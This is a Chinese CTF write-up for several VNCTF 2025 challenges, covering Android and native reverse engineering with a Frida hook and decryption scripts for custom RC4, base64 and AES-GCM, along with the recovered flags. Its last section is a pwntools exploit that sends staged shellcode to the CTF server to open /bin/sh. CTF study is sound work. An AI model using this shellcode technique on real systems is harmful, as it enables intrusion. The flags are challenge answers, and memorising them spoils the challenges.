Carbo
carbofish
  2025-02-09 22:37:38   2025-02-09 23:07:21  1.5k 字  9 分钟  

Hook Fish

hook 以下 fish_fade 方法,防止删掉 dex

1
2
3
4
5
6
7
8
Java.perform(() => {
    let MainActivity = Java.use("com.example.hihitt.MainActivity");
    MainActivity["fish_fade"].implementation = function () {
        console.log(`MainActivity.fish_fade is called`);
        // this["fish_fade"]();
    };
})

然后写解密脚本

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
public static String decrypt(String str) {
    char[] str1 = str.toCharArray();
    System.out.println(Arrays.toString(str1));
    for (int i = 0; i < str1.length; i++) {
        if (str1[i] >= '0' && str1[i] <= '8') {
            str1[i] = (char) ((str1[i] + '1') - (i % 4));
        } else {
            str1[i] = (char) ((str1[i] - '7') - (i % 10));
        }
    }
    code(str1, 0);
    String newStr = new String(str1);
    char[] str12 = new char[newStr.length() / 2];
    for (int i = 0; i < newStr.length(); i += 2) {
        str12[i / 2] = (char) (Integer.parseInt(newStr.substring(i, i + 2), 16) - 68);
    }
    System.out.println(new String(str12));
    return "";
}

Fuko’s starfish

直接 Process-dump https://github.com/glmcdona/Process-Dump

image

标准 aes 找到 key 异或一下 0x17 就行了

image

image

拿出来跑一下 cyberchef 解密就行了

image

kotlindroid

修改 JNI 的 smali,打印 add

image

原样解密就行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
public static byte[] decrypt(byte[] encryptedData, byte[] key) throws Exception {

    byte[] iv = new byte[6];
    byte[] ciphertext = new byte[encryptedData.length - 6];
    System.arraycopy(encryptedData, 0, iv, 0, 6);

    System.arraycopy(encryptedData, 6, ciphertext, 0, ciphertext.length);

    GCMParameterSpec gcmParameterSpec = new GCMParameterSpec(128, iv);

    SecretKey secretKey = new SecretKeySpec(key, "AES");
    Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");

    cipher.init(Cipher.DECRYPT_MODE, secretKey, gcmParameterSpec);
    cipher.updateAAD("mysecretadd".getBytes());
    byte[] plaintext = cipher.doFinal(ciphertext);

    return plaintext;

}

public static void main(String[] args) {
    try {
        System.out.println(new String(decrypt(Base64.getDecoder().decode("MTE0NTE0HMuJKLOW1BqCAi2MxpHYjGjpPq82XXQ/jgx5WYrZ2MV53a9xjQVbRaVdRiXFrSn6EcQPzA=="), "atrikeyssyekirta".getBytes())));
    } catch (Exception e) {
        e.printStackTrace();
    }

}

VNCTF{Y0U_@re_th3_Ma5t3r_0f_C0mp0s3}

抽奖转盘

native 里面一个魔改 RC4(多异或了 0x40) 和 标准base64,每个字符还加了 3,ark 层每个字符异或七减一,RC4密钥 Take_it_easy,密文以 bytebuffer 的形式存在,找不到字符串

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#include "stdio.h"
#include "defs.h"

//s表的长度取256
#define size 256

unsigned char sbox[257] = {0};
unsigned char kbox[257] = {0};

//初始化s表
void init_sbox(unsigned char *key, int keyLen) {
    unsigned int i, j, k;
    int tmp;

    for (i = 0; i < size; i++) {
        sbox[i] = i;
        kbox[i] = key[i % keyLen];
    }

    int v10 = 0;
    for (int j = 0; j < 256; ++j) {
        v10 = (v10 + sbox[j] + kbox[j]) % 256;
        tmp = sbox[j];
        sbox[j] = sbox[v10];
        sbox[v10] = tmp;
    }
}

//加解密函数
void enc_dec(unsigned char *key, unsigned char *data, int strLen, int dataLen) {
    int i, j, k, R, tmp;

    init_sbox(key, strLen);

    j = k = 0;
    for (i = 0; i < dataLen; i++) {
        j = (j + 1) % size;
        k = (k + sbox[j]) % size;

        tmp = sbox[j];
        sbox[j] = sbox[k];
        sbox[k] = tmp;

        R = sbox[(sbox[j] + sbox[k]) % size];

        data[i] ^= R;

        data[i] ^= 40;
    }
}

uint8 aAbcdefghijklmn[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

int main()
{

    uint8 data2[] = {
            101, 74, 76, 49, 101, 76, 117, 87, 55, 69, 118, 68, 118, 69, 55, 67, 61, 83, 62, 111, 81, 77, 115, 101, 53, 73, 83, 66, 68, 114, 109, 108, 75, 66, 97, 117, 93, 127, 115, 124, 109, 82, 93, 115
    };

    for (int i = 0; i < 44; ++i) {
        data2[i] = (data2[i] ^ 7) - 1;
        printf("%c", data2[i]);
    }
    printf("\n");

    uint8 data[] = {
            0x68,0xb2,0x79,0x68,0x9a,0x8e,0xfc,0x0a,0x41,0xa4,0x0f,0xc2,0xf5,0x2f,0x20,0x50,0x8b,0x1a,0xd4,0xc4,0x83,0x06,0xd8,0xa3,0x28,0x37,0xaa,0x63,0x0b,0x33,0x89,0x36,0x2c
    };

    uint8 key[] = "Take_it_easy";
    enc_dec(key, data, 12, 33);

    for (int i = 0; i < 33; ++i) {
        printf("%c", data[i] - 3);
    }

    // Take_it_easy
    return 0;
}

VNCTF{JUst_$ne_Iast_dance_2025!}

AndroidLux

busybox + proot + libexecute劫持libc函数 + 两处花指令

image

base64魔改了表分组模式,第一组六个正常取,剩下的和原版比起来等同于循环左移2bit

socket 的 recv 被魔改了 每个字节异或 1,strncmp 多了个 rot13

image

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
#include "bits/stdc++.h"
#include "defs.h"

unsigned char base64[65] = {
        0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69,
        0x6A, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x47, 0x48, 0x49,
        0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F, 0x50, 0x51, 0x52, 0x53, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F, 0x70,
        0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77, 0x78, 0x79, 0x7A, 0x30, 0x31, 0x32, 0x33, 0x2B, 0x2F,
        0x00
};

unsigned __int8 *encodeBase64(unsigned __int8 *a1, int a2) {
    int v3; // w0
    int v4; // w1
    int v5; // w1
    int v6; // w0
    int v7; // w1
    int v8; // w0
    unsigned __int8 *result; // x0
    _BYTE *v13; // [xsp+58h] [xbp+58h]
    int size_4; // [xsp+68h] [xbp+68h]
    int size_4a; // [xsp+68h] [xbp+68h]
    int v16; // [xsp+6Ch] [xbp+6Ch]

    sqrt((double) 25);
    v16 = 0;
    if (a2 % 3)
        v3 = 4;
    else
        v3 = 0;
    v13 = (uint8 *) malloc(4 * (a2 / 3) + 1 + v3);
    for (size_4 = 0; size_4 < a2; ++size_4) {
        if (a2 - size_4 <= 2) {
            v13[v16] = base64[a1[size_4] >> 2];
            if (a2 - size_4 == 2) {
                v7 = a1[size_4++] & 3;
                v13[v16 + 1] = base64[v7 | ((int) a1[size_4] >> 2) & 0x3C];
                v13[v16 + 2] = base64[a1[size_4] & 0xF];
            } else {
                v13[v16 + 1] = base64[a1[size_4] & 3];
                v13[v16 + 2] = 61;
            }
            v8 = v16 + 3;
            v16 += 4;
            v13[v8] = 61;
        } else {
            v13[v16] = base64[a1[size_4] >> 2];
            v4 = a1[size_4] & 3;
            size_4a = size_4 + 1;
            v13[v16 + 1] = base64[v4 | ((int) a1[size_4a] >> 2) & 0x3C];
            v5 = a1[size_4a] & 0xF;
            size_4 = size_4a + 1;
            v13[v16 + 2] = base64[v5 | (16 * (a1[size_4] >> 6))];
            v6 = v16 + 3;
            v16 += 4;
            v13[v6] = base64[a1[size_4] & 0x3F];
        }
    }
    v13[v16] = 0;
    return v13;
}

void printBinary(unsigned char num) {
    // 假设 int 是 32 位
    for (int i = 7; i >= 0; i--) {
        // 通过右移操作获取每一位的值
        int bit = (num >> i) & 1;
        printf("%d", bit);
    }
    printf("\n");
}


unsigned char *decodeBase64(char *str, int len) {

    char ascill[129];
    int k = 0;
    for (int i = 0; i < 64; i++) {
        ascill[base64[i]] = k++;
    }
    int decodeStrlen = len / 4 * 3 + 1;
    unsigned char *decodeStr = (unsigned char *) malloc(sizeof(char) * decodeStrlen);
    k = 0;
    for (int i = 0; i < len; i++) {
        decodeStr[k++] = (ascill[str[i]] << 2) | (ascill[str[++i]] & 0x3);

        if (str[i + 1] == '=') {
            break;
        }

        printf("%d %d\n", ascill[str[i]], (ascill[str[i]] >> 2));
        decodeStr[k++] = ((ascill[str[i]] >> 2) << 4) | (ascill[str[++i]] & 0xF);
        if (str[i + 1] == '=') {
            break;
        }
        decodeStr[k++] = (((ascill[str[i]] & 0x30) >> 4) << 6) | (ascill[str[++i]]);
    }
    for (int i = 0; i < decodeStrlen; ++i) {
        printBinary(decodeStr[i]);
    }
    printf("\n");
    decodeStr[k] = '\0';
    return decodeStr;
}


int main() {


    // 68GJ6HdqffYuffYqhfTyhgTrImPtTU==
    // 68GJ6HdqffYuffYqhfTyhgTrIT==

    int8 data2[25] = {};
    strcpy(data2, "VNCTF{Youregoodatreverse}");
    uint8 *out2 = encodeBase64((uint8 *) data2, 25);
//    printf("%s\n", out2);

    int8 data[] = "ECIVEA40E9CH67hr6EHU88Etf65Oc8gq8IDz4FCNG8Xw97DtIT==";

    uint8 *ptr = decodeBase64((int8 *) data, strlen((int8 *) data));

    for (int i = 0; i < 37; ++i) {
        ptr[i] ^= 1;
    }

    printf("%s\n", ptr);
    return 0;
}

VNCTF{Ur_go0d_@ndr0id&l1nux_Reve7ser}

VN_Lang

直接 strings 就行了

签个到吧

写两次 shellcode 第一次构造 read 延长输入,第二次直接 getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
import time

context(arch='amd64', os='linux')

'''
mov rsi, rdi
xor rdi, rdi
mov rdx, 0x1000
syscall
'''
payload = b"\x48\x89\xFE\x48\x31\xFF\x48\xC7\xC2\x00\x10\x00\x00\x0F\x05"

p = remote("node.vnteam.cn", 47847)

# gdb.attach(p, "b *$rebase(0x1212)")
# pause()

p.sendlineafter(b"try to show your strength", payload)

time.sleep(1)

'''
mov rdi, rsi
xor rsi, rsi
xor rdx, rdx
mov al, 59
syscall

'''

p.sendline(b"/bin/sh\x00".ljust(len(payload), b"\x00") + b"\x48\x89\xF7\x48\x31\xF6\x48\x31\xD2\xB0\x3B\x0F\x05")

p.interactive()
2025/02/09/vnctf/
作者
carbofish
发布于
2025-02-09 22:37
许可
 评论
评论插件加载失败
正在加载评论插件
  1. Hook Fish
  2. Fuko’s starfish
  3. kotlindroid
  4. 抽奖转盘
  5. AndroidLux
  6. VN_Lang
  7. 签个到吧
© 2024 - 2025    carbofish
由 Hexo 驱动 & 主题 Keep
总字数 55.5k 访客数 访问量
  1. Hook Fish
  2. Fuko’s starfish
  3. kotlindroid
  4. 抽奖转盘
  5. AndroidLux
  6. VN_Lang
  7. 签个到吧